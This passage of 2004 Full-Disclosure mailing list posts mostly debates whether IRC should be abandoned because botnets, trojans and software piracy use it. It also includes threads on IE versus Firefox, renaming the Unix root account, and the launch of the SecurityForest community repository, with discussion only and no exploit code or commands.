bands (ie fire/police). If not, its very close. Given that and the fact that the first harmonic would be much stronger than the 9th harmonic, I'm pretty sure someone in those bands would have complained loudly to the FCC as they don't take intereference issues in those bands lightly. Eh, not only does this happen, heres a recent story on one instance: http://www.technewsworld.com/story/37435.html Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Esmond Kane Sys Admin HUAM DIT ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Why is IRC still around?
I have never replied to anything on this list (I read it to keep up to date on vulnerabilities, but im not really qualified to contribute anything) but this particular message has peaked my interest. 1. Agreed, by using flaws in IE they then go on to subvert mirc into spamming people. 2. They do. 3. A tremendous amount :) 4. This is only because IRC provides the perfect medium in which to control those zombies (a single message from one person is immediately sent to everyone in the channel at the same time). If a better medium was available, they'd use that. IRC is as close to a real time group conversation as you can get that doesn't used closed protocols. It's fast, simple and used by an enormous number of people - particuarly those who play online games, and for open source projects (#gentoo on freenode regularly has over 900 people in it). In answer to your final question - IRC is very useful for quick conversations in real time with groups of people. Sure there are other things - usenet, web based forums, email based mailing lists, IM networks etc but none have that group feeling as much as IRC. It's problem is twofold - firstly, mirc (the most popular client) has a number of flaws that make it easy to steal peoples auth passwords. But these are not automated! The user must be tricked into typing some commands to set the exploit in motion. This is also the second problem - a link may be mentioned in a channel and people will click on it - from there, if your browser is vulnerable, you can be hit by any number of trojans. There was a winamp trojan going about a few months ago (which I reported and is now fixed - go me :D ) which involved clicking a link in irc that opened winamp through a file association that exploited a security flaw that installed a script for mirc that spammed the same link to everyone in the channel. Like any other medium, it is a combination of a lack of knowledge by the users and exploits/vulnerabilities in software, the only difference, is that on IRC it tends to spread quickly because of its real time nature. So in conclusion, no, IRC should not be killed off, mirc's scripting vulnerabilities should be closed in some way, and vulnerabilities in other software should continue to be discovered and fixed. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Danny Sent: 19 November 2004 17:40 To: Mailing List - Full-Disclosure Subject: [Full-Disclosure] Why is IRC still around? Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? If you mean botnets that gather on IRC as a control channel, I believe IRC is used because it's a relatively simple protocol to code to. It'd be just as easy, arguably easier, to use some other protocol. Check out steele's writeup on a web based botnet of proxies: http://lowkeysoft.com/proxy/ The screenshots at least will give you some idea of how effective a web control channel can be. Do you plan on coming back in two or three years to post Why is HTTP still around? 2) A considerable amount of script kiddies originate and grow through IRC? A lot of us originated and grew through IRC, and I'll give it to you that it's a good playground for the kiddies to play in, but I don't really see how any other communication channel would have prevented this. Most of the kids of today and tommorow are probably coming up through web forums and such anyways. 2 years: Why is phpBB still around? 3) A wee bit of software piracy occurs? I'll hand this one to you too, but the actual transfers go from client to client, not through the IRC servers. Surely this isn't any more insidious than meeting up in some other chat protocol or web site to transfer files from one person to another. Compare to bittorrent where public websites can post a torrent, and hundreds of people who wouldn't have a clue as to how to join an IRC channel can distribute a file with surprising efficiency, both downloading and uploading segments to each other in an automated way. 4) That many organized DoS attacks through PC zombies are initiated through IRC? See 1) 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? If you're not connecting through a proxy/3rd party system in some way, then your anonymity on IRC is probably not as high as you might think. The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? Because (assuming that you could somehow stop people from running IRC servers, which I would love to hear how) in two years we'd have to sunset another protocol that people used as a anonymous hangout/warez trading/malware control channel. What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? I don't believe it'd be much safer. The same things that make IRC a nice protocol for script kiddies are the same things that make it a nice simple tool for communication for legitimate purposes. I believe that anything that would prove to be as nice of a chat setup for legitimate users, would be just as convenient for illegitimate purposes. -- Robert Wesley McGrew http://cse.msstate.edu/~rwm8/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Why is IRC still around?
If you DID manage to take away IRC, they'd find another way to manage their bots. Perhaps they'd all migrate their DDoS nets to Battle.net. /jokes Ron Bowes Information Protection Centre Government Of Manitoba -Original Message- From: Danny [mailto:[EMAIL PROTECTED] Sent: Friday, November 19, 2004 2:53 PM To: Bowes, Ronald (EST) Cc: Mailing List - Full-Disclosure Subject: Re: [Full-Disclosure] Why is IRC still around? On Fri, 19 Nov 2004 14:47:36 -0600, Bowes, Ronald (EST) [EMAIL PROTECTED] wrote: How exactly do you propose to accomplish this? IRC is an open protocol and there are many open clients and open servers which can run on any port, and run encrypted with SSL. So do you intend to scan every computer on the Internet on port 6667, and shut down every server found running, the move on to random ports that zombies probably use, and start attacking sites that provide open source clients that use an open protocol? Your suggestion makes no sense, and it's something that's impossible to implement. Why not just make knives illegal? I mean, they're frequently used as a weapon, right? Yah, you are right. I just needed to rant when I see all these trojan's written to call home (to an IRC channel) and DoS attacks coordinated via IRC to control unpatched anti-virus-less Windows PC zombies. Next topic... ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
An excellent question. On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ME2 http://www.santeriasys.net/rss.php ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Andrew Farmer wrote: In fact, I'm not so sure it's even a component of Nautilus. Is this a recent change? Nope - it depends on how you install Nautilus, though. I know that on a number of RH systems I've had to configure lately, Mozilla is a dependancy (not firefox) because Nautilus seems to use it. (at least in RH - my recollection of whether it's available as a dependancy in the Nautilus source code is hazy, it's been a long time since I've compiled GNOME and it will most likely be an even longer time before I do it again.) -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
I wish it was possible, but it just wouldn't work. The hackers would move onto the next best chat system, whatever that may be at the time. For it ever to work, you would need to ban all chat communications and peer 2 peer on the internet, and thats unlikely to happen, and would be hard to police. In the meantime what would you do with the billions of legitimate users of IRC, IM and P2P? Tell them to go away as well? I'm anti-malicious hackers, but this idea just would never work. Thanks,n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? Isn't email the primary spreading mechanism of viruses? should we sunset email? 2) A considerable amount of script kiddies originate and grow through IRC? And if there were no IRC, they would use AIM, or MSN messenger, or more likely, jabber. What's the difference? It is popular amongst hackers (of any level of morality) because it is open. 3) A wee bit of software piracy occurs? And it doesn't on any other protocol? People who want to pirate will do it using whatever tools are available. Take away one, and others will be used. 4) That many organized DoS attacks through PC zombies are initiated through IRC? It wouldn't be any harder to pull this off via netcat. If it is the anonymity an attacker wants, they just use one of the zombies as the server. 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? How is it any more anonymous than email, or web, or any other unauthenticated protocol? Please don't tell me you trust the From: header in your email, or believe that all of the IPs in your weblogs are directly tied to a person's home PC. The list goes on and on... Yes, but every one of those arguments is horribly flawed. I am not sure if you are just being a troll or what. Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? Am I narrow minded to say that it would be a much safer place? yes, you are being narrow-minded. tim ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, 2004-11-19 at 20:40, Jeremy Davis wrote: Are you able to change root's name in nix? Why not if the answer is no? (Things would break right? UID 0?) Knowing the account name is two-thirds of the battle. In windows it's fairly easy to change the admin name. Not a professional here just curious... You can change the name of the root account in Unix, just like the Administrator account in Windows. But you can not change the UID of the root account (0) just like you can not change the SID of the Administrator account (500). I argue that changing the account name in Unix does as little or much as changing the account name in Windows. If you have access to the system you can easily find the account name of the UID 0 account, just as easily as you can figure out the name of the SID x-500 account. The difference is that you can change and hard code that change in the source of Unix (at least with those that you have the source for, Linux, *BSD, whatever). Can you do that with Windows? Regards, Frank signature.asc Description: This is a digitally signed message part
RE: [Full-Disclosure] IE is just as safe as FireFox
I 100% agree with you. I never said MS was the best or even that they should always be used. In fact in many occasions I have pushed for alternative answers for companies who were customers. Being the best or even better doesn't mean you will become the most popular either. Look at Apple. Look at BetaMax. Look at lots of things. To fully be honest though, MS isn't McDonalds. MS in the food world would be McDonald's, Burger King, Wendies, Hardees, Taco Bell, Red Robin, Olive Garden, Dominoes, Pizza Hut, Little Caesers, Jack in the Box, and every other food chain you know of and also every major diner and eatery you know of. The things that weren't Microsoft would be the little corner deli's, placed that are called names like Michael's kitchen or Mohsin's Falafel stand. It is a simple fact of life that MS has enough overall market share to make the penetration of all other OS'es look like rounding errors. MS appeals to the masses, the others appeal to niche areas. Look at the numbers. This means that we have to do serious work at getting the stuff corrected. Whining and complaining that they aren't the best or that they suck or that billg is hellspawn does nothing to help anyone. Basically, just because MS is on top, doesn't mean we shouldn't work to push them to get better or give up and say, OS * does it much better, forget them. But at the same time, we have to be realistic about the goals and what needs to be done. Someone saying that they won't use IE and any web site that requires it is stupid because they aren't following web standards is rather shortsighted and having troubles grasping reality. Someone saying that MS needs to rip all of that out immediately is also having reality issues. I do think it is right and feasible for MS to give people a choice as to whether they want IE bits on a machine or not at all (this includes all of the bits). If I run an MS box and html content doesn't work in my MS mail reader, I am not going to be overly upset. If I was, then say I install that component. The realistic gripe is that we don't have the option to not load IE at the moment. Trying to change that is a realistic goal, definitely on servers for instance, users aren't visiting web sites from servers or at least probably shouldn't be. Microsoft can become secure and they are working towards it. It is just going to take a good amount of work to do so. :o) joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: john morris [mailto:[EMAIL PROTECTED] Sent: Friday, November 19, 2004 4:32 PM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Dear Joe, So many out there use MS OS doesnt make it the best just as so many people go to McDonalds doesnt mean they make the best food -- (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SecurityForest - Public Release #1
Hi Gregory, As to my knowledge, the internet is a global network and all the information contained within is openly available. I also don't see the "advantage" you have mentioned - are we at competition with one another ? Secondly, thanx for the complement on the "idea". As mentioned in SecurityForest's Mission - "for the community - by the community". I hope that the security community will see an advantage in contributing as without it, the Forest will not grow and therefore the community will not gain this medium of shared knowledge. Best Regards, Loni [EMAIL PROTECTED] www.securityforest.com Date: Fri, 19 Nov 2004 08:27:27 -0800From: Gregory Gilliss [EMAIL PROTECTED]To: [EMAIL PROTECTED]Subject: Re: [Full-Disclosure] SecurityForest - Public Release #1Reply-To: Gregory Gilliss [EMAIL PROTECTED]Yeah, I'd like for my country to accummulate all the available computer security knowledge too...one heck of a competative advantage to have.Registrant: Alon Swartz Har Sinai St Raanana, NA 43307 Israel Registered through: GoDaddy.com Domain Name: SECURITYFOREST.COM Created on: 14-Sep-04 Expires on: 14-Sep-05 Last Updated on: 14-Sep-04 Administrative Contact: Swartz, Alon [EMAIL PROTECTED] Har Sinai St Raanana, NA 43307 Israel 97745657 Fax -- Technical Contact: Swartz, Alon [EMAIL PROTECTED] Har Sinai St Raanana, NA 43307 Israel 97745657 Fax -- Domain servers in listed order: NS1.EVERYDNS.NET NS2.EVERYDNS.NETPity the US is so busy scaring the population that they have no time tocome up with ideas like this...-- GregOn or about 2004.11.19 12:41:29 +, [EMAIL PROTECTED] ([EMAIL PROTECTED]) said: Community Website: http://www.securityforest.com Community IRC channel: irc://irc.unixgods.net:/securityforest Table of contents = Summary The Open Source Idea Tree's in the Forest ExploitTree ToolTree TutorialTree LinkTree GreenHouse Thanks Summary === SecurityForest.com is a collaboratively edited Forest consisting of Trees which anyone can contribute to. SecurityForest's trees are specific security repositories that are categorized for practical reasons. The technologies currently in use in these repositories are based on Wiki technology and CVS (Concurrent Versioning System) technology. Depending on the species of the tree - the suitable technology will be used. SecurityForest.com is a collection of repositories (trees) for the community - by the community. In other words - the updating, modifying and improving can be done by anyone in the community. This public release is posted at http://www.securityforest.com/wiki/index.php?title=SecurityForest_-_Public_Release_no.1 The Open Source Idea The basic idea behind Open Source is very simple: When people can read, modify and improve a piece of software, the software evolves. People improve it, people adapt it, people fix bugs. And this can happen at a speed that, if one is used to the slow pace of conventional development, seems astonishing. We at SecurityForest have learned that this rapid evolutionary process produces better results than the traditional closed model, in which only very few people improve the Security Repositories and everybody else must use what these individuals have come across and added. SecurityForest is not only based on OpenSource software, but itself is opensource meaning the updating, modifying and improving can be done by anyone in the community. Tree's in the Forest SNIP -- Gregory A. Gilliss, CISSP E-mail: [EMAIL PROTECTED]Computer Security WWW: http://www.gilliss.com/greg/PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3
